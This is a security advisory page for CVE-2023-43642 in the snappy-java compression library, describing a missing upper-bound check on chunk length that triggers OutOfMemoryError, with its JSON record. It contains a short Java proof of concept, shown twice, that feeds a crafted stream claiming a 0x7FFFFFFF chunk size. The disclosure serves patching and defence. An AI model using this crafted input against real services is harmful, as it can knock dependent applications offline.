GHSA-55G7-9CWV-5QFV

Vulnerability from github – Published: 2023-09-25 18:30 – Updated: 2023-09-25 21:43
VLAI
Summary
snappy-java's missing upper bound check on chunk length can lead to Denial of Service (DoS) impact
Details

Summary

snappy-java is a data compression library in Java. Its SnappyInputStream was found to be vulnerable to Denial of Service (DoS) attacks when decompressing data with a too-large chunk size. Due to missing upper bound check on chunk length, an unrecoverable fatal error can occur.

Scope

All versions of snappy-java including the latest released version 1.1.10.3. A fix is applied in 1.1.10.4

Details

While performing mitigation efforts related to CVE-2023-34455 in Confluent products, our Application Security team closely analyzed the fix that was accepted and merged into snappy-java version 1.1.10.1 in this commit. The check on line 421 only attempts to check if chunkSize is not a negative value. We believe that this is an inadequate fix as it misses an upper-bounds check for overly positive values such as 0x7FFFFFFF (or (2,147,483,647 in decimal) before actually attempting to allocate the provided unverified number of bytes via the “chunkSize” variable. This missing upper-bounds check can lead to the applications depending upon snappy-java to allocate an inappropriate number of bytes on the heap which can then cause an java.lang.OutOfMemoryError exception. Under some specific conditions and contexts, this can lead to a Denial-of-Service (DoS) attack with a direct impact on the availability of the dependent implementations based on the usage of the snappy-java library for compression/decompression needs.

PoC

Compile and run the following code:

package org.example;
import org.xerial.snappy.SnappyInputStream;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};
        SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
        byte[] out = new byte[50];
        try {
            in.read(out);
        }
        catch (Exception ignored) {
        }
    }
}

Impact

Denial of Service of applications dependent on snappy-java especially if ExitOnOutOfMemoryError or CrashOnOutOfMemoryError is configured on the JVM.

Credits

Jan Werner, Mukul Khullar and Bharadwaj Machiraju from Confluent's Application Security team.

We kindly request for a new CVE ID to be assigned once you acknowledge this vulnerability.

Severity
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.10.3"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.xerial.snappy:snappy-java"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.10.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-43642"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-09-25T18:30:18Z",
    "nvd_published_at": "2023-09-25T20:15:11Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nsnappy-java is a data compression library in Java. Its SnappyInputStream was found to be vulnerable to Denial of Service (DoS) attacks when decompressing data with a too-large chunk size. Due to missing upper bound check on chunk length, an unrecoverable fatal error can occur. \n\n### Scope\n\nAll versions of snappy-java including the latest released version 1.1.10.3.  A fix is applied in 1.1.10.4\n\n### Details\nWhile performing mitigation efforts related to [CVE-2023-34455](https://nvd.nist.gov/vuln/detail/CVE-2023-34455) in Confluent products, our Application Security team closely analyzed the fix that was accepted and merged into snappy-java version 1.1.10.1 in [this](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea) commit. The check on [line 421](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR421) only attempts to check if chunkSize is not a negative value. We believe that this is an inadequate fix as it misses an upper-bounds check for overly positive values such as 0x7FFFFFFF (or (2,147,483,647 in decimal) before actually [attempting to allocate](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR429) the provided unverified number of bytes via the \u201cchunkSize\u201d variable. This missing upper-bounds check can lead to the applications depending upon snappy-java to allocate an inappropriate number of bytes on the heap which can then cause an  java.lang.OutOfMemoryError exception. Under some specific conditions and contexts, this can lead to a Denial-of-Service (DoS) attack with a direct impact on the availability of the dependent implementations based on the usage of the snappy-java library for compression/decompression needs.\n\n### PoC\nCompile and run the following code:\n```\npackage org.example;\nimport org.xerial.snappy.SnappyInputStream;\n\nimport java.io.*;\n\npublic class Main {\n\n    public static void main(String[] args) throws IOException {\n        byte[] data = {-126, \u0027S\u0027, \u0027N\u0027, \u0027A\u0027, \u0027P\u0027, \u0027P\u0027, \u0027Y\u0027, 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};\n        SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));\n        byte[] out = new byte[50];\n        try {\n            in.read(out);\n        }\n        catch (Exception ignored) {\n        }\n    }\n}\n```\n\n### Impact\nDenial of Service of applications dependent on snappy-java especially if `ExitOnOutOfMemoryError` or `CrashOnOutOfMemoryError` is configured on the JVM.\n\n### Credits\nJan Werner, Mukul Khullar and Bharadwaj Machiraju from Confluent\u0027s Application Security team. \n\nWe kindly request for a new CVE ID to be assigned once you acknowledge this vulnerability.",
  "id": "GHSA-55g7-9cwv-5qfv",
  "modified": "2023-09-25T21:43:08Z",
  "published": "2023-09-25T18:30:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-55g7-9cwv-5qfv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43642"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/commit/9f8c3cf74223ed0a8a834134be9c917b9f10ceb5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xerial/snappy-java"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/releases/tag/v1.1.10.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "snappy-java\u0027s missing upper bound check on chunk length can lead to Denial of Service (DoS) impact"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.